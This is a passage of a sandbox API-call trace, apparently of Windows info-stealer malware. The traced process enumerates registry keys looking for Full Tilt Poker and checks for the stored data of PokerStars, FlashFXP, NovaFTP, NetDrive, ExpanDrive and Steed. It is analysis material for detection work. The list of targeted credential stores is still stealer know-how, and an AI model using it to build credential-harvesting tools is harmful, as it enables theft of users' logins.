hHeap=0x690000) returned 1 [0147.142] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.143] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x1, pszName=0x6aa2c8, pcchName=0x19fb90 | out: pszName="IM Providers", pcchName=0x19fb90) returned 0x0 [0147.143] GetProcessHeap () returned 0x690000 [0147.143] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6a9020 [0147.144] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.144] RegOpenKeyW (in: hKey=0x210, lpSubKey="IM Providers", phkResult=0x6a9020 | out: phkResult=0x6a9020*=0x204) returned 0x0 [0147.146] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.146] StrStrW (lpFirst="IM Providers", lpSrch="Full Tilt Poker") returned 0x0 [0147.156] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.157] RegCloseKey (hKey=0x204) returned 0x0 [0147.157] GetProcessHeap () returned 0x690000 [0147.157] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9020 | out: hHeap=0x690000) returned 1 [0147.158] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.158] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x2, pszName=0x6aa2c8, pcchName=0x19fb90 | out: pszName="Microsoft", pcchName=0x19fb90) returned 0x0 [0147.158] GetProcessHeap () returned 0x690000 [0147.158] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4e0 [0147.159] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.160] RegOpenKeyW (in: hKey=0x210, lpSubKey="Microsoft", phkResult=0x6ab4e0 | out: phkResult=0x6ab4e0*=0x204) returned 0x0 [0147.160] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.161] StrStrW (lpFirst="Microsoft", lpSrch="Full Tilt Poker") returned 0x0 [0147.161] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.162] RegCloseKey (hKey=0x204) returned 0x0 [0147.162] GetProcessHeap () returned 0x690000 [0147.162] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4e0 | out: hHeap=0x690000) returned 1 [0147.163] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.163] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x3, pszName=0x6aa2c8, pcchName=0x19fb90 | out: pszName="Netscape", pcchName=0x19fb90) returned 0x0 [0147.163] GetProcessHeap () returned 0x690000 [0147.163] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3f0 [0147.165] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.165] RegOpenKeyW (in: hKey=0x210, lpSubKey="Netscape", phkResult=0x6ab3f0 | out: phkResult=0x6ab3f0*=0x204) returned 0x0 [0147.166] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.166] StrStrW (lpFirst="Netscape", lpSrch="Full Tilt Poker") returned 0x0 [0147.168] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.168] RegCloseKey (hKey=0x204) returned 0x0 [0147.168] GetProcessHeap () returned 0x690000 [0147.169] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3f0 | out: hHeap=0x690000) returned 1 [0147.169] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.170] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x4, pszName=0x6aa2c8, pcchName=0x19fb90 | out: pszName="ODBC", pcchName=0x19fb90) returned 0x0 [0147.170] GetProcessHeap () returned 0x690000 [0147.170] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab490 [0147.171] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.171] RegOpenKeyW (in: hKey=0x210, lpSubKey="ODBC", phkResult=0x6ab490 | out: phkResult=0x6ab490*=0x204) returned 0x0 [0147.172] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.173] StrStrW (lpFirst="ODBC", lpSrch="Full Tilt Poker") returned 0x0 [0147.173] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.174] RegCloseKey (hKey=0x204) returned 0x0 [0147.174] GetProcessHeap () returned 0x690000 [0147.174] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab490 | out: hHeap=0x690000) returned 1 [0147.175] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.175] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x5, pszName=0x6aa2c8, pcchName=0x19fb90 | out: pszName="Policies", pcchName=0x19fb90) returned 0x0 [0147.175] GetProcessHeap () returned 0x690000 [0147.175] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0147.176] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.177] RegOpenKeyW (in: hKey=0x210, lpSubKey="Policies", phkResult=0x6ab3d0 | out: phkResult=0x6ab3d0*=0x204) returned 0x0 [0147.178] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.178] StrStrW (lpFirst="Policies", lpSrch="Full Tilt Poker") returned 0x0 [0147.179] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.180] RegCloseKey (hKey=0x204) returned 0x0 [0147.180] GetProcessHeap () returned 0x690000 [0147.180] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0147.180] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.181] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x6, pszName=0x6aa2c8, pcchName=0x19fb90 | out: pszName="RegisteredApplications", pcchName=0x19fb90) returned 0x0 [0147.181] GetProcessHeap () returned 0x690000 [0147.181] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4b0 [0147.182] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.182] RegOpenKeyW (in: hKey=0x210, lpSubKey="RegisteredApplications", phkResult=0x6ab4b0 | out: phkResult=0x6ab4b0*=0x204) returned 0x0 [0147.183] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.183] StrStrW (lpFirst="RegisteredApplications", lpSrch="Full Tilt Poker") returned 0x0 [0147.184] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.185] RegCloseKey (hKey=0x204) returned 0x0 [0147.185] GetProcessHeap () returned 0x690000 [0147.185] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4b0 | out: hHeap=0x690000) returned 1 [0147.186] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.186] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x7, pszName=0x6aa2c8, pcchName=0x19fb90 | out: pszName="Wow6432Node", pcchName=0x19fb90) returned 0x0 [0147.186] GetProcessHeap () returned 0x690000 [0147.186] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3e0 [0147.187] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.188] RegOpenKeyW (in: hKey=0x210, lpSubKey="Wow6432Node", phkResult=0x6ab3e0 | out: phkResult=0x6ab3e0*=0x204) returned 0x0 [0147.189] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.189] StrStrW (lpFirst="Wow6432Node", lpSrch="Full Tilt Poker") returned 0x0 [0147.190] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.190] RegCloseKey (hKey=0x204) returned 0x0 [0147.190] GetProcessHeap () returned 0x690000 [0147.190] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3e0 | out: hHeap=0x690000) returned 1 [0147.247] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.247] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x8, pszName=0x6aa2c8, pcchName=0x19fb90 | out: pszName="Classes", pcchName=0x19fb90) returned 0x0 [0147.248] GetProcessHeap () returned 0x690000 [0147.248] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4b0 [0147.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.249] RegOpenKeyW (in: hKey=0x210, lpSubKey="Classes", phkResult=0x6ab4b0 | out: phkResult=0x6ab4b0*=0x204) returned 0x0 [0147.250] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.250] StrStrW (lpFirst="Classes", lpSrch="Full Tilt Poker") returned 0x0 [0147.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.251] RegCloseKey (hKey=0x204) returned 0x0 [0147.251] GetProcessHeap () returned 0x690000 [0147.251] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4b0 | out: hHeap=0x690000) returned 1 [0147.252] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.252] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x9, pszName=0x6aa2c8, pcchName=0x19fb90 | out: pszName="", pcchName=0x19fb90) returned 0x103 [0147.252] GetProcessHeap () returned 0x690000 [0147.253] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.254] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.255] RegCloseKey (hKey=0x210) returned 0x0 [0147.255] GetProcessHeap () returned 0x690000 [0147.255] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4b48 | out: hHeap=0x690000) returned 1 [0147.255] GetProcessHeap () returned 0x690000 [0147.255] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0147.259] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0147.260] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0147.260] Sleep (dwMilliseconds=0xa) [0147.290] GetProcessHeap () returned 0x690000 [0147.290] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4a) returned 0x6ab500 [0147.290] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.291] wvsprintfW (in: param_1=0x6ab500, param_2="%s\\%s", arglist=0x19f920 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\PokerStars*") returned 47 [0147.291] GetProcessHeap () returned 0x690000 [0147.291] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x62) returned 0x6a8db8 [0147.291] GetProcessHeap () returned 0x690000 [0147.292] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.293] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\PokerStars*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\pokerstars*"), lpFindFileData=0x19f934 | out: lpFindFileData=0x19f934*(dwFileAttributes=0x207d0, ftCreationTime.dwLowDateTime=0x6, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x6a8db8, ftLastWriteTime.dwLowDateTime=0x11, ftLastWriteTime.dwHighDateTime=0x696b40, nFileSizeHigh=0x0, nFileSizeLow=0x11, dwReserved0=0x1010000, dwReserved1=0x11, cFileName="\x11", cAlternateFileName="ᕿ酰ᅛ䇰")) returned 0xffffffff [0147.293] GetProcessHeap () returned 0x690000 [0147.294] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0147.294] GetProcessHeap () returned 0x690000 [0147.294] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.294] GetProcessHeap () returned 0x690000 [0147.294] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e8) returned 0x6aa2c8 [0147.295] GetProcessHeap () returned 0x690000 [0147.295] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xc) returned 0x69b3f8 [0147.295] GetProcessHeap () returned 0x690000 [0147.295] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6ab500 [0147.296] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0147.297] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x6ab500 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0147.297] GetProcessHeap () returned 0x690000 [0147.297] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5a) returned 0x6ab710 [0147.298] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.299] wvsprintfW (in: param_1=0x6ab710, param_2="%s\\ExpanDrive", arglist=0x19fb84 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ExpanDrive") returned 46 [0147.299] GetProcessHeap () returned 0x690000 [0147.299] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x60) returned 0x6a8db8 [0147.299] GetProcessHeap () returned 0x690000 [0147.300] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab710 | out: hHeap=0x690000) returned 1 [0147.301] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.301] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ExpanDrive") returned 0 [0147.302] GetProcessHeap () returned 0x690000 [0147.302] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.302] GetProcessHeap () returned 0x690000 [0147.302] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0147.302] GetProcessHeap () returned 0x690000 [0147.302] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6ab500 [0147.303] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0147.303] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x6ab500 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0147.304] GetProcessHeap () returned 0x690000 [0147.304] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5a) returned 0x6ab710 [0147.304] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.305] wvsprintfW (in: param_1=0x6ab710, param_2="%s\\ExpanDrive", arglist=0x19fb6c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ExpanDrive") returned 46 [0147.305] GetProcessHeap () returned 0x690000 [0147.305] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x60) returned 0x6a8db8 [0147.305] GetProcessHeap () returned 0x690000 [0147.305] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab710 | out: hHeap=0x690000) returned 1 [0147.306] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.306] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ExpanDrive") returned 0 [0147.306] GetProcessHeap () returned 0x690000 [0147.307] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.307] GetProcessHeap () returned 0x690000 [0147.307] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0147.307] GetProcessHeap () returned 0x690000 [0147.307] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.307] GetProcessHeap () returned 0x690000 [0147.307] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69b3f8 | out: hHeap=0x690000) returned 1 [0147.308] GetProcessHeap () returned 0x690000 [0147.308] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6c) returned 0x6ab500 [0147.309] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.310] wvsprintfW (in: param_1=0x6ab500, param_2="%s\\Steed\\bookmarks.txt", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Steed\\bookmarks.txt") returned 57 [0147.310] GetProcessHeap () returned 0x690000 [0147.310] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x76) returned 0x6a78f0 [0147.310] GetProcessHeap () returned 0x690000 [0147.310] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.311] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.312] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Steed\\bookmarks.txt") returned 0 [0147.312] GetProcessHeap () returned 0x690000 [0147.312] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a78f0 | out: hHeap=0x690000) returned 1 [0147.312] GetProcessHeap () returned 0x690000 [0147.312] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x400) returned 0x6aa2c8 [0147.312] GetProcessHeap () returned 0x690000 [0147.312] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xc) returned 0x69b3e0 [0147.312] GetProcessHeap () returned 0x690000 [0147.312] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6ab500 [0147.313] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0147.319] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6ab500 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0147.319] GetProcessHeap () returned 0x690000 [0147.319] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f56) returned 0x6ab710 [0147.320] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.320] wvsprintfW (in: param_1=0x6ab710, param_2="%s\\FlashFXP", arglist=0x19fb88 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashFXP") returned 46 [0147.320] GetProcessHeap () returned 0x690000 [0147.320] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x60) returned 0x6a8db8 [0147.320] GetProcessHeap () returned 0x690000 [0147.321] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab710 | out: hHeap=0x690000) returned 1 [0147.322] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.322] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashFXP") returned 0 [0147.323] GetProcessHeap () returned 0x690000 [0147.323] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.323] GetProcessHeap () returned 0x690000 [0147.323] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0147.324] GetProcessHeap () returned 0x690000 [0147.324] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6ab500 [0147.324] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0147.325] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6ab500 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0147.325] GetProcessHeap () returned 0x690000 [0147.325] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f56) returned 0x6ab710 [0147.326] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.326] wvsprintfW (in: param_1=0x6ab710, param_2="%s\\FlashFXP", arglist=0x19fb70 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashFXP") returned 46 [0147.326] GetProcessHeap () returned 0x690000 [0147.327] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x60) returned 0x6a8db8 [0147.327] GetProcessHeap () returned 0x690000 [0147.327] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab710 | out: hHeap=0x690000) returned 1 [0147.328] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.328] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashFXP") returned 0 [0147.328] GetProcessHeap () returned 0x690000 [0147.329] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.329] GetProcessHeap () returned 0x690000 [0147.329] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0147.329] GetProcessHeap () returned 0x690000 [0147.329] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6ab500 [0147.330] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0147.330] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x6ab500 | out: pszPath="C:\\ProgramData") returned 0x0 [0147.331] GetProcessHeap () returned 0x690000 [0147.331] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f56) returned 0x6ab710 [0147.332] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.332] wvsprintfW (in: param_1=0x6ab710, param_2="%s\\FlashFXP", arglist=0x19fb58 | out: param_1="C:\\ProgramData\\FlashFXP") returned 23 [0147.332] GetProcessHeap () returned 0x690000 [0147.332] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x32) returned 0x69cfa8 [0147.332] GetProcessHeap () returned 0x690000 [0147.333] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab710 | out: hHeap=0x690000) returned 1 [0147.334] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.334] PathFileExistsW (pszPath="C:\\ProgramData\\FlashFXP") returned 0 [0147.334] GetProcessHeap () returned 0x690000 [0147.334] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.334] GetProcessHeap () returned 0x690000 [0147.334] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69cfa8 | out: hHeap=0x690000) returned 1 [0147.335] GetProcessHeap () returned 0x690000 [0147.335] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6ab500 [0147.335] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0147.336] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x6ab500 | out: pszPath="C:\\ProgramData") returned 0x0 [0147.336] GetProcessHeap () returned 0x690000 [0147.336] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f56) returned 0x6ab710 [0147.336] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.337] wvsprintfW (in: param_1=0x6ab710, param_2="%s\\FlashFXP", arglist=0x19fb88 | out: param_1="C:\\ProgramData\\FlashFXP") returned 23 [0147.337] GetProcessHeap () returned 0x690000 [0147.337] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x32) returned 0x69d328 [0147.337] GetProcessHeap () returned 0x690000 [0147.337] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab710 | out: hHeap=0x690000) returned 1 [0147.338] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.338] PathFileExistsW (pszPath="C:\\ProgramData\\FlashFXP") returned 0 [0147.339] GetProcessHeap () returned 0x690000 [0147.339] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.339] GetProcessHeap () returned 0x690000 [0147.339] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69d328 | out: hHeap=0x690000) returned 1 [0147.339] GetProcessHeap () returned 0x690000 [0147.340] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.340] GetProcessHeap () returned 0x690000 [0147.340] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69b3e0 | out: hHeap=0x690000) returned 1 [0147.340] GetProcessHeap () returned 0x690000 [0147.340] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0147.341] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0147.342] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0147.342] GetProcessHeap () returned 0x690000 [0147.342] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f80) returned 0x6ab500 [0147.343] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.344] wvsprintfW (in: param_1=0x6ab500, param_2="%s\\INSoftware\\NovaFTP\\NovaFTP.db", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\INSoftware\\NovaFTP\\NovaFTP.db") returned 65 [0147.344] GetProcessHeap () returned 0x690000 [0147.344] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x86) returned 0x6aa4d8 [0147.344] GetProcessHeap () returned 0x690000 [0147.345] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.346] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.346] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\INSoftware\\NovaFTP\\NovaFTP.db") returned 0 [0147.346] GetProcessHeap () returned 0x690000 [0147.347] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa4d8 | out: hHeap=0x690000) returned 1 [0147.347] GetProcessHeap () returned 0x690000 [0147.347] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.348] GetProcessHeap () returned 0x690000 [0147.348] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6e) returned 0x6ab500 [0147.348] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.349] wvsprintfW (in: param_1=0x6ab500, param_2="%s\\NetDrive\\NDSites.ini", arglist=0x19fb9c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetDrive\\NDSites.ini") returned 58 [0147.349] GetProcessHeap () returned 0x690000 [0147.349] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x78) returned 0x6a7df0 [0147.349] GetProcessHeap () returned 0x690000 [0147.350] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.350] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.350] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetDrive\\NDSites.ini") returned 0 [0147.351] GetProcessHeap () returned 0x690000 [0147.351] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a7df0 | out: hHeap=0x690000) returned 1 [0147.351] GetProcessHeap () returned 0x690000 [0147.351] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6e) returned 0x6ab500 [0147.352] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.352] wvsprintfW (in: param_1=0x6ab500, param_2="%s\\NetDrive2\\drives.dat", arglist=0x19fb90 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetDrive2\\drives.dat") returned 58 [0147.352] GetProcessHeap () returned 0x690000 [0147.352] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x78) returned 0x6a6ff0 [0147.352] GetProcessHeap () returned 0x690000 [0147.353] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.354] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.354] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetDrive2\\drives.dat") returned 0 [0147.362] GetProcessHeap () returned 0x690000 [0147.362] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a6ff0 | out: hHeap=0x690000) returned 1 [0147.363] GetProcessHeap () returned 0x690000 [0147.363] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0147.363] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0147.364] SHGetFolderPathW (in: 